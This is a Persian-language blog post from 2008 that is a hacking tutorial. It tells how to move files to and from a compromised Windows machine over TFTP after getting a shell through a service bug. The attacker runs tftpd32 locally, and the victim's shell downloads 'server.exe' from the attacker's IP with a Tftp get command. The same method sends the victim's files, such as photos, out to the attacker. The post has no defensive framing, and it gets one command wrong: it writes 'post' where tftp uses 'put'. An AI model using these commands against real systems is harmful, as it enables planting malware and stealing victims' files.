| تبليغات | X |
 |
 |
|
| This Hacker Bye Hasti |
|
وقتی که ما از یک Server و یا یک Client با استفاده از باگ آن (بطور مثال Lsass ,Dcom ,IIS ,Apache,Mysql ,...) یک سطح دسترسی (Shell ) می گیریم می تونیم اونجا مثل Command pormpt سیستم خودمون کارائی انجام بدیم و لی برای ارسال و دریافت فایل باید از tftp استفاده کنیم .کلاینت این برنامه در شاخه ی System32 همه ی سیستم عامل های windows هستش و شما می تونید با اجرا کردن tftp که از اینجا میتونید داونلودش کنید در سیستم خودتون نقش Server رو بازی کنید و چون به کلاینت اون دسترسی دارید بهش دستور ارسال و دریافت از Server تون که تو سیستم شما در حال اجراست رو بدید (یک ارتباط Client & ُServer ای )
خوب برای شروع این کار بعد از DowanloadکردنTftpاز اینجا فایل tftpd32.exe رو از توش اجرا کنید و قتی که باز شد می تونید ip خودتون رو اونجا ببینید اگه اولش 192 داشت یا به بیانی Unvalid بود برین اینجا و ip valid خودتون رو ببینید چون به این ip احتیاج داریم .بعدش دکمه ی Browse رو تو tFtp بزنید و به طور مثال دایرکتری Desktop رو بهش بدید و بعدش show Dir رو تو برنامه بزنید و فایلی رو که میخواین به سیستم طرف انتقال بدین رو انتخاب کنید مثلآ Server.exe خوب حالا برید تو shell ای که ازش گرفتین و به tFtp اون دستور بدید که Server.exe رو بگیره برای این کار از این دستور استفاده کنید Tftp -i 62.32.45.67 get server.exe که این ip همون ip ای هستش که از تو سایت گرفتیم (ip خودتون) دستور get برای اینه که به tFtp اون بگه فایل رو بگیره . شما در هر دایرکتری در سیستم طرف که باشید این فایل همون جا کپی مس شه و تو shell مینویسه Transfer Successful حال برای اینکه بتونیم فایلی رو از سیستمش بگیریم باید بریم تو همون شاخه ای که اون فایل هست تو shell بعد اونجا بنویسیم tFtp -i 62.32.45.67 post aks.jpg با این دستور فایل ( عکس و برنامه و ..) رو که از سیستم اون برای شما می فرسته که درصد فایل های ارسالی و دریافتی تو tFtp قابل مشاهده هستش این روش ارسال و دریافت رو برای شلی که با iRcHaTaN Ps 7.1 از سیستم قربانی میگیدید هم میتونید استفاده کنید برای ارسال: Tftp -i 62.32.45.67 get server.exe  برای دریافت: Tftp -i 62.32.45.67 post server.exe |
|
+ نوشته شده در
شنبه چهاردهم اردیبهشت 1387ساعت 8:28 توسط Hasti |
|
|
صفحه نخست پست الکترونیک آرشیو |
| درباره وبلاگ |
|
| نوشته های پیشین |
|
خرداد 1387 اردیبهشت 1387 |
| نویسندگان |
|
Hasti هستی |
|
RSS
|